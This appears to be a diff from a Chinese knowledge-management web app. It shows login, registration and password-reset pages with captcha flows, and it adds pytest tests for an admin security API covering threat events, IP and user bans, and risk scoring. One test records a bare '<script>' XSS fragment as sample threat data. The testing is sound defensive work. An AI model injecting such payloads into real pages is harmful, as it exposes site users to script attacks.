<div id="successMessage" class="message success"></div>
<form id="loginForm" onsubmit="handleLogin(event)">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" placeholder="请输入用户名" required>
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" placeholder="请输入密码" required>
</div>
<div id="captchaGroup" class="form-group" style="display: none;">
<label for="captcha">验证码</label>
<div class="captcha-row">
<input type="text" id="captcha" name="captcha" placeholder="请输入验证码">
<img id="captchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshCaptcha()">🔄</button>
</div>
</div>
<div class="forgot-link">
<a href="#" onclick="showForgotPassword(event)">忘记密码?</a>
<span id="resendVerifyLink" style="display: none; margin-left: 16px;"><a href="#" onclick="showResendVerify(event)">重发验证邮件</a></span>
</div>
<button type="submit" class="btn-login">登 录</button>
</form>
<div class="register-link">还没有账号? <a href="/register">立即注册</a></div>
</div>
</div>
<div id="forgotPasswordModal" class="modal-overlay" onclick="if(event.target===this)closeForgotPassword()">
<div class="modal">
<div class="modal-header"><h2>重置密码</h2><p id="resetModalDesc">填写信息后等待管理员审核</p></div>
<div class="modal-body">
<div id="modalErrorMessage" class="message error"></div>
<div id="modalSuccessMessage" class="message success"></div>
<!-- 邮件重置方式(启用邮件功能时显示) -->
<form id="emailResetForm" onsubmit="handleEmailReset(event)" style="display: none;">
<div class="form-group"><label>邮箱</label><input type="email" id="emailResetEmail" placeholder="请输入注册邮箱" required></div>
<div class="form-group">
<label>验证码</label>
<div class="captcha-row">
<input type="text" id="emailResetCaptcha" placeholder="请输入验证码" required>
<img id="emailResetCaptchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshEmailResetCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshEmailResetCaptcha()">🔄</button>
</div>
</div>
</form>
<!-- 管理员审核方式(未启用邮件功能时显示) -->
<form id="resetPasswordForm" onsubmit="handleResetPassword(event)">
<div class="form-group"><label>用户名</label><input type="text" id="resetUsername" placeholder="请输入用户名" required></div>
<div class="form-group"><label>邮箱(可选)</label><input type="email" id="resetEmail" placeholder="用于验证身份"></div>
<div class="form-group"><label>新密码</label><input type="password" id="resetNewPassword" placeholder="至少8位包含字母和数字" required></div>
</form>
</div>
<div class="modal-footer">
<button type="button" class="btn-secondary" onclick="closeForgotPassword()">取消</button>
<button type="button" class="btn-primary" id="resetSubmitBtn" onclick="submitResetForm()">提交申请</button>
</div>
</div>
</div>
<!-- 重发验证邮件弹窗 -->
<div id="resendVerifyModal" class="modal-overlay" onclick="if(event.target===this)closeResendVerify()">
<div class="modal">
<div class="modal-header"><h2>重发验证邮件</h2><p>输入注册时使用的邮箱</p></div>
<div class="modal-body">
<div id="resendErrorMessage" class="message error"></div>
<div id="resendSuccessMessage" class="message success"></div>
<form id="resendVerifyForm" onsubmit="handleResendVerify(event)">
<div class="form-group"><label>邮箱</label><input type="email" id="resendEmail" placeholder="请输入注册邮箱" required></div>
<div class="form-group">
<label>验证码</label>
<div class="captcha-row">
<input type="text" id="resendCaptcha" placeholder="请输入验证码" required>
<img id="resendCaptchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshResendCaptcha()" title="点击刷新">
<button type="button" class="captcha-refresh" onclick="refreshResendCaptcha()">🔄</button>
</div>
</div>
</form>
</div>
<div class="modal-footer">
<button type="button" class="btn-secondary" onclick="closeResendVerify()">取消</button>
<button type="button" class="btn-primary" onclick="document.getElementById('resendVerifyForm').dispatchEvent(new Event('submit'))">发送验证邮件</button>
</div>
</div>
</div>
<script>
let captchaSession = '';
let resendCaptchaSession = '';
let emailResetCaptchaSession = '';
let needCaptcha = false;
let emailEnabled = false;
// 页面加载时检查邮箱验证是否启用
window.onload = async function() {
try {
const resp = await fetch('/api/email/verify-status');
const data = await resp.json();
emailEnabled = data.email_enabled;
if (data.register_verify_enabled) {
document.getElementById('resendVerifyLink').style.display = 'inline';
}
} catch (e) {
console.log('获取邮箱验证状态失败', e);
}
};
async function handleLogin(event) {
event.preventDefault();
const username = document.getElementById('username').value.trim();
const password = document.getElementById('password').value.trim();
const captcha = document.getElementById('captcha') ? document.getElementById('captcha').value.trim() : '';
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
if (!username || !password) { errorDiv.textContent = '用户名和密码不能为空'; errorDiv.style.display = 'block'; return; }
if (needCaptcha && !captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/login', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, password, captcha_session: captchaSession, captcha, need_captcha: needCaptcha }) });
const data = await response.json();
if (response.ok) { successDiv.textContent = '登录成功,正在跳转...'; successDiv.style.display = 'block'; setTimeout(() => { window.location.href = '/app'; }, 500); }
else { errorDiv.textContent = data.error || '登录失败'; errorDiv.style.display = 'block'; if (data.need_captcha) { needCaptcha = true; document.getElementById('captchaGroup').style.display = 'block'; await generateCaptcha(); } }
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
async function showForgotPassword(event) {
event.preventDefault();
document.getElementById('forgotPasswordModal').classList.add('active');
document.getElementById('modalErrorMessage').style.display = 'none';
document.getElementById('modalSuccessMessage').style.display = 'none';
// 根据邮件功能状态切换显示
if (emailEnabled) {
document.getElementById('emailResetForm').style.display = 'block';
document.getElementById('resetPasswordForm').style.display = 'none';
document.getElementById('resetModalDesc').textContent = '输入注册邮箱,我们将发送重置链接';
document.getElementById('resetSubmitBtn').textContent = '发送重置邮件';
await generateEmailResetCaptcha();
} else {
document.getElementById('emailResetForm').style.display = 'none';
document.getElementById('resetPasswordForm').style.display = 'block';
document.getElementById('resetModalDesc').textContent = '填写信息后等待管理员审核';
document.getElementById('resetSubmitBtn').textContent = '提交申请';
}
}
function closeForgotPassword() {
document.getElementById('forgotPasswordModal').classList.remove('active');
document.getElementById('resetPasswordForm').reset();
document.getElementById('emailResetForm').reset();
document.getElementById('modalErrorMessage').style.display = 'none';
document.getElementById('modalSuccessMessage').style.display = 'none';
}
function submitResetForm() {
if (emailEnabled) {
document.getElementById('emailResetForm').dispatchEvent(new Event('submit'));
} else {
document.getElementById('resetPasswordForm').dispatchEvent(new Event('submit'));
}
}
async function handleResetPassword(event) {
event.preventDefault();
const username = document.getElementById('resetUsername').value.trim();
const email = document.getElementById('resetEmail').value.trim();
const newPassword = document.getElementById('resetNewPassword').value.trim();
const errorDiv = document.getElementById('modalErrorMessage');
const successDiv = document.getElementById('modalSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!username || !newPassword) { errorDiv.textContent = '用户名和新密码不能为空'; errorDiv.style.display = 'block'; return; }
if (newPassword.length < 8) { errorDiv.textContent = '密码长度至少8位'; errorDiv.style.display = 'block'; return; }
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) { errorDiv.textContent = '密码必须包含字母和数字'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/reset_password_request', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, email, new_password: newPassword }) });
const data = await response.json();
if (response.ok) { successDiv.textContent = '申请已提交,请等待审核'; successDiv.style.display = 'block'; setTimeout(closeForgotPassword, 2000); }
else { errorDiv.textContent = data.error || '申请失败'; errorDiv.style.display = 'block'; }
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
async function generateCaptcha() { try { const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } }); const data = await response.json(); if (data.session_id && data.captcha_image) { captchaSession = data.session_id; document.getElementById('captchaImage').src = data.captcha_image; } } catch (error) { console.error('生成验证码失败:', error); } }
async function refreshCaptcha() { await generateCaptcha(); document.getElementById('captcha').value = ''; }
// 邮件方式重置密码相关函数
async function generateEmailResetCaptcha() {
try {
const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } });
const data = await response.json();
if (data.session_id && data.captcha_image) {
emailResetCaptchaSession = data.session_id;
document.getElementById('emailResetCaptchaImage').src = data.captcha_image;
}
} catch (error) { console.error('生成验证码失败:', error); }
}
async function refreshEmailResetCaptcha() { await generateEmailResetCaptcha(); document.getElementById('emailResetCaptcha').value = ''; }
async function handleEmailReset(event) {
event.preventDefault();
const email = document.getElementById('emailResetEmail').value.trim();
const captcha = document.getElementById('emailResetCaptcha').value.trim();
const errorDiv = document.getElementById('modalErrorMessage');
const successDiv = document.getElementById('modalSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!email) { errorDiv.textContent = '请输入邮箱'; errorDiv.style.display = 'block'; return; }
if (!captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/forgot-password', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email, captcha_session: emailResetCaptchaSession, captcha })
});
const data = await response.json();
if (response.ok) {
successDiv.innerHTML = data.message + '<br><small style="color: #666;">请检查您的邮箱(包括垃圾邮件文件夹)</small>';
successDiv.style.display = 'block';
setTimeout(closeForgotPassword, 3000);
} else {
errorDiv.textContent = data.error || '发送失败';
errorDiv.style.display = 'block';
await refreshEmailResetCaptcha();
}
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
// 重发验证邮件相关函数
async function showResendVerify(event) {
event.preventDefault();
document.getElementById('resendVerifyModal').classList.add('active');
await generateResendCaptcha();
}
function closeResendVerify() {
document.getElementById('resendVerifyModal').classList.remove('active');
document.getElementById('resendVerifyForm').reset();
document.getElementById('resendErrorMessage').style.display = 'none';
document.getElementById('resendSuccessMessage').style.display = 'none';
}
async function generateResendCaptcha() {
try {
const response = await fetch('/api/generate_captcha', { method: 'POST', headers: { 'Content-Type': 'application/json' } });
const data = await response.json();
if (data.session_id && data.captcha_image) {
resendCaptchaSession = data.session_id;
document.getElementById('resendCaptchaImage').src = data.captcha_image;
}
} catch (error) { console.error('生成验证码失败:', error); }
}
async function refreshResendCaptcha() { await generateResendCaptcha(); document.getElementById('resendCaptcha').value = ''; }
async function handleResendVerify(event) {
event.preventDefault();
const email = document.getElementById('resendEmail').value.trim();
const captcha = document.getElementById('resendCaptcha').value.trim();
const errorDiv = document.getElementById('resendErrorMessage');
const successDiv = document.getElementById('resendSuccessMessage');
errorDiv.style.display = 'none'; successDiv.style.display = 'none';
if (!email) { errorDiv.textContent = '请输入邮箱'; errorDiv.style.display = 'block'; return; }
if (!captcha) { errorDiv.textContent = '请输入验证码'; errorDiv.style.display = 'block'; return; }
try {
const response = await fetch('/api/resend-verify-email', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email, captcha_session: resendCaptchaSession, captcha })
});
const data = await response.json();
if (response.ok) {
successDiv.textContent = data.message || '验证邮件已发送,请查收';
successDiv.style.display = 'block';
setTimeout(closeResendVerify, 2000);
} else {
errorDiv.textContent = data.error || '发送失败';
errorDiv.style.display = 'block';
await refreshResendCaptcha();
}
} catch (error) { errorDiv.textContent = '网络错误'; errorDiv.style.display = 'block'; }
}
document.addEventListener('keydown', (e) => { if (e.key === 'Escape') { closeForgotPassword(); closeResendVerify(); } });
</script>
</body>
</html>

View File

@@ -1,318 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>用户注册 - 知识管理平台</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Microsoft YaHei', Arial, sans-serif;
background: linear-gradient(135deg, #56CCF2 0%, #2F80ED 100%);
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.register-container {
background: white;
border-radius: 10px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
width: 400px;
padding: 40px;
}
.register-header {
text-align: center;
margin-bottom: 30px;
}
.register-header h1 {
font-size: 28px;
color: #333;
margin-bottom: 10px;
}
.register-header p {
color: #666;
font-size: 14px;
}
.form-group {
margin-bottom: 20px;
}
.form-group label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: bold;
}
.form-group input {
width: 100%;
padding: 12px;
border: 1px solid #ddd;
border-radius: 5px;
font-size: 14px;
transition: border-color 0.3s;
}
.form-group input:focus {
outline: none;
border-color: #2F80ED;
}
.form-group small {
color: #888;
font-size: 12px;
display: block;
margin-top: 5px;
}
.btn-register {
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #56CCF2 0%, #2F80ED 100%);
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
font-weight: bold;
cursor: pointer;
transition: transform 0.2s;
}
.btn-register:hover {
transform: translateY(-2px);
}
.btn-register:active {
transform: translateY(0);
}
.login-link {
text-align: center;
margin-top: 20px;
color: #666;
}
.login-link a {
color: #2F80ED;
text-decoration: none;
font-weight: bold;
}
.login-link a:hover {
text-decoration: underline;
}
.error-message {
background: #ffe6e6;
color: #d63031;
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
display: none;
}
.success-message {
background: #e6ffe6;
color: #27ae60;
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
display: none;
}
@media (max-width: 480px) {
body { padding: 12px; align-items: flex-start; padding-top: 20px; }
.register-container { width: 100%; max-width: 100%; padding: 24px 20px; }
.register-header h1 { font-size: 24px; }
.register-header p { font-size: 13px; }
.form-group { margin-bottom: 18px; }
.form-group label { font-size: 13px; }
.form-group input { padding: 11px; font-size: 16px; } /* iOS防止自动缩放 */
.form-group small { font-size: 11px; }
.btn-register { padding: 13px; font-size: 15px; }
.login-link { margin-top: 16px; font-size: 14px; }
}
</style>
</head>
<body>
<div class="register-container">
<div class="register-header">
<h1>用户注册</h1>
</div>
<div id="errorMessage" class="error-message"></div>
<div id="successMessage" class="success-message"></div>
<form id="registerForm" onsubmit="handleRegister(event)">
<div class="form-group">
<label for="username">用户名 *</label>
<input type="text" id="username" name="username" required minlength="3">
<small>至少3个字符</small>
</div>
<div class="form-group">
<label for="password">密码 *</label>
<input type="password" id="password" name="password" required minlength="6">
<small>至少6个字符</small>
</div>
<div class="form-group">
<label for="confirm_password">确认密码 *</label>
<input type="password" id="confirm_password" name="confirm_password" required>
</div>
<div class="form-group">
<label for="email">邮箱 <span id="emailRequired" style="color: #d63031; display: none;">*</span></label>
<input type="email" id="email" name="email">
<small id="emailHint">选填,用于接收审核通知</small>
</div>
<div class="form-group">
<label for="captcha">验证码</label>
<div style="display: flex; gap: 10px; align-items: center;">
<input type="text" id="captcha" placeholder="请输入验证码" required style="flex: 1;">
<img id="captchaImage" src="" alt="验证码" style="height: 50px; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;" onclick="refreshCaptcha()" title="点击刷新">
<button type="button" onclick="refreshCaptcha()" style="padding: 8px 15px; background: #f0f0f0; border: 1px solid #ddd; border-radius: 4px; cursor: pointer;">刷新</button>
</div>
</div>
<button type="submit" class="btn-register">注册</button>
</form>
<div class="login-link">
已有账号? <a href="/login">立即登录</a>
</div>
</div>
<script>
let captchaSession = '';
let emailVerifyEnabled = false;
window.onload = async function() {
await generateCaptcha();
await checkEmailVerifyStatus();
};
async function checkEmailVerifyStatus() {
try {
const resp = await fetch('/api/email/verify-status');
const data = await resp.json();
emailVerifyEnabled = data.register_verify_enabled;
if (emailVerifyEnabled) {
document.getElementById('emailRequired').style.display = 'inline';
document.getElementById('email').required = true;
document.getElementById('emailHint').textContent = '必填,用于账号验证';
}
} catch (e) {
console.log('获取邮箱验证状态失败', e);
}
}
async function handleRegister(event) {
event.preventDefault();
const username = document.getElementById('username').value.trim();
const password = document.getElementById('password').value.trim();
const confirmPassword = document.getElementById('confirm_password').value.trim();
const email = document.getElementById('email').value.trim();
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
// 验证
if (username.length < 3) {
errorDiv.textContent = '用户名至少3个字符';
errorDiv.style.display = 'block';
return;
}
if (password.length < 6) {
errorDiv.textContent = '密码至少6个字符';
errorDiv.style.display = 'block';
return;
}
if (password !== confirmPassword) {
errorDiv.textContent = '两次输入的密码不一致';
errorDiv.style.display = 'block';
return;
}
// 邮箱验证启用时必填
if (emailVerifyEnabled && !email) {
errorDiv.textContent = '请填写邮箱地址用于账号验证';
errorDiv.style.display = 'block';
return;
}
// 邮箱格式验证
if (email && !email.includes('@')) {
errorDiv.textContent = '邮箱格式不正确';
errorDiv.style.display = 'block';
return;
}
try {
const response = await fetch('/api/register', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({ username, password, email, captcha_session: captchaSession, captcha: document.getElementById('captcha').value.trim() })
});
const data = await response.json();
if (response.ok) {
// 根据是否需要邮箱验证显示不同的消息
if (data.need_verify) {
successDiv.innerHTML = data.message + '<br><small style="color: #666;">请检查您的邮箱(包括垃圾邮件文件夹)</small>';
} else {
successDiv.textContent = data.message || '注册成功,请等待管理员审核';
}
successDiv.style.display = 'block';
// 清空表单
document.getElementById('registerForm').reset();
// 3秒后跳转到登录页
setTimeout(() => {
window.location.href = '/login';
}, 3000);
} else {
errorDiv.textContent = data.error || '注册失败';
errorDiv.style.display = 'block';
refreshCaptcha();
}
} catch (error) {
errorDiv.textContent = '网络错误,请稍后重试';
errorDiv.style.display = 'block';
}
}
async function generateCaptcha() {
const resp = await fetch('/api/generate_captcha', {method: 'POST', headers: {'Content-Type': 'application/json'}});
const data = await resp.json();
if (data.session_id && data.captcha_image) {
captchaSession = data.session_id;
document.getElementById('captchaImage').src = data.captcha_image;
}
}
async function refreshCaptcha() { await generateCaptcha(); document.getElementById('captcha').value = ''; }
</script>
</body>
</html>

View File

@@ -1,266 +0,0 @@
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>重置密码 - 知识管理平台</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Microsoft YaHei', Arial, sans-serif;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 20px;
}
.card {
background: white;
border-radius: 15px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
padding: 40px;
text-align: center;
max-width: 450px;
width: 100%;
}
.icon {
width: 80px;
height: 80px;
background: linear-gradient(135deg, #e74c3c, #c0392b);
border-radius: 50%;
display: flex;
align-items: center;
justify-content: center;
margin: 0 auto 25px;
}
.icon svg {
width: 40px;
height: 40px;
fill: white;
}
h1 {
color: #333;
font-size: 24px;
margin-bottom: 10px;
}
p {
color: #666;
font-size: 14px;
line-height: 1.6;
margin-bottom: 25px;
}
.form-group {
margin-bottom: 20px;
text-align: left;
}
.form-group label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: bold;
font-size: 14px;
}
.form-group input {
width: 100%;
padding: 12px 15px;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 14px;
transition: border-color 0.3s;
}
.form-group input:focus {
outline: none;
border-color: #667eea;
}
.form-group small {
color: #999;
font-size: 12px;
margin-top: 5px;
display: block;
}
.btn {
width: 100%;
padding: 14px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
border: none;
border-radius: 30px;
font-size: 16px;
font-weight: bold;
cursor: pointer;
transition: transform 0.2s, box-shadow 0.2s;
}
.btn:hover {
transform: translateY(-2px);
box-shadow: 0 5px 20px rgba(102, 126, 234, 0.4);
}
.btn:disabled {
background: #ccc;
cursor: not-allowed;
transform: none;
box-shadow: none;
}
.message {
padding: 12px 15px;
border-radius: 8px;
margin-bottom: 20px;
font-size: 14px;
display: none;
}
.message.error {
background: #ffe6e6;
color: #d63031;
border: 1px solid #ffcdd2;
}
.message.success {
background: #e6ffe6;
color: #27ae60;
border: 1px solid #c8e6c9;
}
.back-link {
margin-top: 20px;
}
.back-link a {
color: #667eea;
text-decoration: none;
font-size: 14px;
}
.back-link a:hover {
text-decoration: underline;
}
.expired {
display: none;
}
.expired .icon {
background: linear-gradient(135deg, #95a5a6, #7f8c8d);
}
@media (max-width: 480px) {
body { padding: 12px; }
.card { padding: 30px 20px; }
h1 { font-size: 20px; }
}
</style>
</head>
<body>
<div class="card" id="resetForm">
<div class="icon">
<svg viewBox="0 0 24 24">
<path d="M12.65 10C11.83 7.67 9.61 6 7 6c-3.31 0-6 2.69-6 6s2.69 6 6 6c2.61 0 4.83-1.67 5.65-4H17v4h4v-4h2v-4H12.65zM7 14c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"/>
</svg>
</div>
<h1>重置密码</h1>
<p>请输入您的新密码</p>
<div id="errorMessage" class="message error"></div>
<div id="successMessage" class="message success"></div>
<form onsubmit="handleResetPassword(event)">
<div class="form-group">
<label for="newPassword">新密码</label>
<input type="password" id="newPassword" placeholder="请输入新密码" required minlength="8">
<small>至少8位包含字母和数字</small>
</div>
<div class="form-group">
<label for="confirmPassword">确认密码</label>
<input type="password" id="confirmPassword" placeholder="请再次输入新密码" required>
</div>
<button type="submit" class="btn" id="submitBtn">确认重置</button>
</form>
<div class="back-link">
<a href="/login">返回登录</a>
</div>
</div>
<div class="card expired" id="expiredCard">
<div class="icon">
<svg viewBox="0 0 24 24">
<path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"/>
</svg>
</div>
<h1>链接已失效</h1>
<p>{{ error_message }}</p>
<div class="back-link">
<a href="/login">返回登录</a>
</div>
</div>
<script>
const token = '{{ token }}';
const isValid = {{ 'true' if valid else 'false' }};
if (!isValid) {
document.getElementById('resetForm').style.display = 'none';
document.getElementById('expiredCard').style.display = 'block';
}
async function handleResetPassword(event) {
event.preventDefault();
const newPassword = document.getElementById('newPassword').value;
const confirmPassword = document.getElementById('confirmPassword').value;
const errorDiv = document.getElementById('errorMessage');
const successDiv = document.getElementById('successMessage');
const submitBtn = document.getElementById('submitBtn');
errorDiv.style.display = 'none';
successDiv.style.display = 'none';
// 验证密码
if (newPassword.length < 8) {
errorDiv.textContent = '密码长度至少8位';
errorDiv.style.display = 'block';
return;
}
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
errorDiv.textContent = '密码必须包含字母和数字';
errorDiv.style.display = 'block';
return;
}
if (newPassword !== confirmPassword) {
errorDiv.textContent = '两次输入的密码不一致';
errorDiv.style.display = 'block';
return;
}
submitBtn.disabled = true;
submitBtn.textContent = '处理中...';
try {
const response = await fetch('/api/reset-password-confirm', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ token, new_password: newPassword })
});
const data = await response.json();
if (response.ok) {
successDiv.textContent = '密码重置成功3秒后跳转到登录页面...';
successDiv.style.display = 'block';
setTimeout(() => {
window.location.href = '/login';
}, 3000);
} else {
errorDiv.textContent = data.error || '重置失败';
errorDiv.style.display = 'block';
submitBtn.disabled = false;
submitBtn.textContent = '确认重置';
}
} catch (error) {
errorDiv.textContent = '网络错误,请稍后重试';
errorDiv.style.display = 'block';
submitBtn.disabled = false;
submitBtn.textContent = '确认重置';
}
}
</script>
</body>
</html>

View File

@@ -0,0 +1,249 @@
from __future__ import annotations
from datetime import timedelta
import pytest
from flask import Flask
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "admin_security_api_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app() -> Flask:
from routes.admin_api.security import security_bp
app = Flask(__name__)
app.config.update(SECRET_KEY="test-secret", TESTING=True)
app.register_blueprint(security_bp)
return app
def _login_admin(client) -> None:
with client.session_transaction() as sess:
sess["admin_id"] = 1
sess["admin_username"] = "admin"
def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str):
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(threat_type, int(score), ip, user_id, "/api/test", payload, created_at),
)
conn.commit()
def test_dashboard_requires_admin(_test_db):
app = _make_app()
client = app.test_client()
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 403
assert resp.get_json() == {"error": "需要管理员权限"}
def test_dashboard_counts_and_payload_truncation(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
within_24h = now.strftime("%Y-%m-%d %H:%M:%S")
within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S")
long_payload = "x" * 300
_insert_threat_event(
threat_type="sql_injection",
score=90,
ip="1.2.3.4",
user_id=10,
created_at=within_24h,
payload=long_payload,
)
_insert_threat_event(
threat_type="xss",
score=70,
ip="2.3.4.5",
user_id=11,
created_at=within_24h_2,
payload="short",
)
_insert_threat_event(
threat_type="path_traversal",
score=60,
ip="9.9.9.9",
user_id=None,
created_at=older,
payload="old",
)
manager = BlacklistManager()
manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False)
manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False)
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 200
data = resp.get_json()
assert data["threat_events_24h"] == 2
assert data["banned_ip_count"] == 1
assert data["banned_user_count"] == 1
recent = data["recent_threat_events"]
assert isinstance(recent, list)
assert len(recent) == 3
payload_preview = recent[0]["value_preview"]
assert isinstance(payload_preview, str)
assert len(payload_preview) <= 200
assert payload_preview.endswith("...")
def test_threats_pagination_and_filters(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S")
t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S")
t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S")
_insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a")
_insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b")
_insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c")
resp = client.get("/api/admin/security/threats?page=1&per_page=2")
assert resp.status_code == 200
data = resp.get_json()
assert data["total"] == 3
assert len(data["items"]) == 2
resp2 = client.get("/api/admin/security/threats?page=2&per_page=2")
assert resp2.status_code == 200
data2 = resp2.get_json()
assert data2["total"] == 3
assert len(data2["items"]) == 1
resp3 = client.get("/api/admin/security/threats?event_type=sql_injection")
assert resp3.status_code == 200
data3 = resp3.get_json()
assert data3["total"] == 1
assert data3["items"][0]["threat_type"] == "sql_injection"
resp4 = client.get("/api/admin/security/threats?severity=high")
assert resp4.status_code == 200
data4 = resp4.get_json()
assert data4["total"] == 2
assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"}
def test_ban_and_unban_ip(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1})
assert resp.status_code == 200
assert resp.get_json()["success"] is True
list_resp = client.get("/api/admin/security/banned-ips")
assert list_resp.status_code == 200
payload = list_resp.get_json()
assert payload["count"] == 1
assert payload["items"][0]["ip"] == "7.7.7.7"
resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"})
assert resp2.status_code == 200
assert resp2.get_json()["success"] is True
list_resp2 = client.get("/api/admin/security/banned-ips")
assert list_resp2.status_code == 200
assert list_resp2.get_json()["count"] == 0
def test_risk_endpoints_and_cleanup(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
scorer = RiskScorer(auto_ban_enabled=False)
scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="<script>")
ip_resp = client.get("/api/admin/security/ip-risk/4.4.4.4")
assert ip_resp.status_code == 200
ip_data = ip_resp.get_json()
assert ip_data["risk_score"] == 20
assert len(ip_data["threat_history"]) >= 1
user_resp = client.get("/api/admin/security/user-risk/44")
assert user_resp.status_code == 200
user_data = user_resp.get_json()
assert user_data["risk_score"] == 20
assert len(user_data["threat_history"]) >= 1
# Prepare decaying scores and expired ban
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
("5.5.5.5", old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
""",
("6.6.6.6", "expired", old_ts, old_ts),
)
conn.commit()
